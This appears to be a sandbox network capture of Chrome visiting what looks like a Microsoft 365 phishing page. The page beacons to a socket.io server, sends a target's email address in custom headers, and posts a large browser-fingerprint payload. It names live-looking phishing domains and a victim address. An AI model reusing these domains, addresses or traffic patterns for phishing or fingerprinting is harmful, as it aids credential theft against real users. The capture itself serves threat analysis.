                                                        2025-03-27 13:41:41 UTC937INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:41 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YncMMhkvuMoPKbzWpZdar7aq7vN68ugzeOa5miWkPOcGH4Y%2Fv55cZwitfOmFERONgNyC6bFGTl631pumhPAzYaZSzTmGN6WBisswjXjLZEVnn1Tume8QYz9GoKmXR2OPMcekMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e86dcb70f89-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84469&min_rtt=83179&rtt_var=18901&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1165&delivery_rate=36747&cwnd=252&unsent_bytes=0&cid=4e67539402e17f95&ts=306&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.549768172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:41 UTC592OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNraio&sid=3KIffrGciGku9LcFAAe0 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:41 UTC947INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:41 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hcsGh1a8UlzFlU1Va%2Bk43ATSp4eRCc6VCxmqnOYimQUHiZuAkObsqbbrQ%2FoAOBea2WQXXDHm2PoSgaqLdayEii2i4H8c%2BWMsQJBmx3TW%2FONmzcUgkG9m8NsEu8%2B5qAoAWwz%2FNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e86dc8b4310-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83646&min_rtt=83633&rtt_var=17655&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1164&delivery_rate=36536&cwnd=252&unsent_bytes=0&cid=2366b65e1b1b82f5&ts=309&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.549769172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:41 UTC425OUTGET /socket.io/?EIO=4&transport=polling&t=PNNraPW HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:41 UTC848INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:41 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xgW6DxGJ%2Bv7z5bRmAArAukFkR712VLtrMxPfLNfK6%2FzNvG3JrWf6aD7iv8k5yrWK42VQz1QzIA1nkhujUVPTS71O5i7x2RHjd8eOHobYb6Q%2FypGsTT6s4oZEyjOktZXOlzQ%2Fmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e876a85dafc-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84005&min_rtt=83964&rtt_var=17779&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=997&delivery_rate=36330&cwnd=252&unsent_bytes=0&cid=4cf197ee688878f0&ts=304&x=0"
                                                        2025-03-27 13:41:41 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 74 7a 36 42 4d 4b 4f 37 66 78 75 6e 34 50 4e 57 41 41 65 31 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"tz6BMKO7fxun4PNWAAe1","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.549770172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:41 UTC752OUTPOST /socket.io/?EIO=4&transport=polling&t=PNNrail&sid=3KIffrGciGku9LcFAAe0 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Content-Length: 2
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Content-type: text/plain;charset=UTF-8
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:41 UTC2OUTData Raw: 34 30
                                                        Data Ascii: 40
                                                        2025-03-27 13:41:42 UTC291INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:42 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: no-store
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e89c9abc331-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-27 13:41:42 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                        Data Ascii: 2ok
                                                        2025-03-27 13:41:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.549771172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:41 UTC692OUTGET /socket.io/?EIO=4&transport=polling&t=PNNraio&sid=3KIffrGciGku9LcFAAe0 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:42 UTC847INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:42 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r80faipNIEUnZOcMMJIAjVqBYEpxILgT3%2FQzFdvq1EzqMGXO0DBDU4TIg10ydj1brZDvwDs7SMlN0%2F0rSUzCB8NxmX9TK5u%2BWzzwkftJQxlD481rCz%2Bz2ykHBE24agsAJ3IdJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e89ded44309-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83720&min_rtt=83209&rtt_var=18322&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1264&delivery_rate=36062&cwnd=252&unsent_bytes=0&cid=c6d94683d9e72555&ts=796&x=0"
                                                        2025-03-27 13:41:42 UTC1INData Raw: 31
                                                        Data Ascii: 1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.549772172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:42 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrail&sid=3KIffrGciGku9LcFAAe0 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:42 UTC799INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:42 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FxO8685t35w%2Bv5lljRNAbMrP7a17bv1ntb5IM%2FjMxx0R158ugTKMVK9ARL3Aqlh%2FB8gR9FVIKEDpZliRr2q3Bb1QApTDvTqd9vEhkxwbaILun1mOKJ%2Bib5tZgyqxHypanhedIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e8cecfe426a-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83925&min_rtt=83794&rtt_var=17873&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1022&delivery_rate=36304&cwnd=252&unsent_bytes=0&cid=4313757039cbf058&ts=313&x=0"
                                                        2025-03-27 13:41:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.549773104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:42 UTC1041OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        Content-Length: 147028
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://www.oyabarista.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:42 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                        2025-03-27 13:41:42 UTC16384OUTData Raw: 32 43 25 32 32 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42
                                                        Data Ascii: 2C%22XMLHttpRequest%22%3A%22function+XMLHttpRequest%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B
                                                        2025-03-27 13:41:42 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 50 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69
                                                        Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAnimatedString%22%3A%22function+SVGAnimatedString%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedRect%22%3A%22function+SVGAnimatedRect%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedPreserveAspectRatio%22%3A%22functi
                                                        2025-03-27 13:41:42 UTC16384OUTData Raw: 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 61 70 74 69 6f 6e 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62
                                                        Data Ascii: 7D%22%2C%22HTMLTableColElement%22%3A%22function+HTMLTableColElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCellElement%22%3A%22function+HTMLTableCellElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCaptionElement%22%3A%22function+HTMLTab
                                                        2025-03-27 13:41:42 UTC16384OUTData Raw: 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 66 72 61 6d 65 73 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 66
                                                        Data Ascii: B+%5Bnative+code%5D+%7D%22%2C%22CSSLayerBlockRule%22%3A%22function+CSSLayerBlockRule%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeywordValue%22%3A%22function+CSSKeywordValue%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeyframesRule%22%3A%22function+CSSKeyf
                                                        2025-03-27 13:41:42 UTC16384OUTData Raw: 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 57 72 69 74 61 62 6c 65 46 69 6c 65 53 74
                                                        Data Ascii: %28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemFileHandle%22%3A%22function+FileSystemFileHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemHandle%22%3A%22function+FileSystemHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemWritableFileSt
                                                        2025-03-27 13:41:42 UTC16384OUTData Raw: 32 25 32 43 25 32 32 54 61 73 6b 53 69 67 6e 61 6c 25 32 32 25 32 43 25 32 32 54 61 73 6b 50 72 69 6f 72 69 74 79 43 68 61 6e 67 65 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 54 61 73 6b 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 32 43 25 32 32 54 61 73 6b 41 74 74 72 69 62 75 74 69 6f 6e 54 69 6d 69 6e 67 25 32 32 25 32 43 25 32 32 53 79 6e 63 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 53 75 62 6d 69 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 4c 69 73 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 52 65 61 64 4f 6e 6c 79 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 25 32 32 25 32 43 25 32 32 53 74 6f 72
                                                        Data Ascii: 2%2C%22TaskSignal%22%2C%22TaskPriorityChangeEvent%22%2C%22TaskController%22%2C%22TaskAttributionTiming%22%2C%22SyncManager%22%2C%22SubmitEvent%22%2C%22StyleSheetList%22%2C%22StyleSheet%22%2C%22StylePropertyMapReadOnly%22%2C%22StylePropertyMap%22%2C%22Stor
                                                        2025-03-27 13:41:42 UTC16384OUTData Raw: 32 63 6c 6f 73 65 25 32 32 25 32 43 25 32 32 63 6f 6e 66 69 72 6d 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 25 32 32 25 32 43 25 32 32 66 65 74 63 68 25 32 32 25 32 43 25 32 32 66 69 6e 64 25 32 32 25 32 43 25 32 32 66 6f 63 75 73 25 32 32 25 32 43 25 32 32 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 25 32 32 25 32 43 25 32 32 67 65 74 53 65 6c 65 63 74 69 6f 6e 25 32 32 25 32 43 25 32 32 6d 61 74 63 68 4d 65 64 69 61 25 32 32 25 32 43 25 32 32 6d 6f 76 65 42 79 25 32 32 25 32 43 25 32 32 6d 6f 76 65 54 6f 25 32 32 25 32 43 25 32 32 6f 70 65 6e 25 32 32 25 32 43 25 32 32 70 6f 73 74 4d 65 73 73 61 67 65 25 32 32 25 32 43 25 32 32 70 72 69 6e 74 25 32 32 25 32 43 25 32 32 70 72 6f 6d 70 74 25 32 32 25 32 43 25 32 32
                                                        Data Ascii: 2close%22%2C%22confirm%22%2C%22createImageBitmap%22%2C%22fetch%22%2C%22find%22%2C%22focus%22%2C%22getComputedStyle%22%2C%22getSelection%22%2C%22matchMedia%22%2C%22moveBy%22%2C%22moveTo%22%2C%22open%22%2C%22postMessage%22%2C%22print%22%2C%22prompt%22%2C%22
                                                        2025-03-27 13:41:42 UTC15956OUTData Raw: 53 74 61 6d 70 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 74 69 6d 65 53 74 61 6d 70 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 6f 6e 74 65 78 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 6f 6e 74 65 78 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 54 61 73 6b 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 54 61 73 6b 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6d 65 6d 6f 72 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 4d 65 6d 6f 72
                                                        Data Ascii: Stamp%22%3A%22function+timeStamp%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22context%22%3A%22function+context%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createTask%22%3A%22function+createTask%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22memory%22%3A%22%5Bobject+Memor


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.549775172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:43 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNraio&sid=3KIffrGciGku9LcFAAe0 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:43 UTC282INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:43 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e92d9740f43-EWR
                                                        alt-svc: h3=":443"; ma=86400
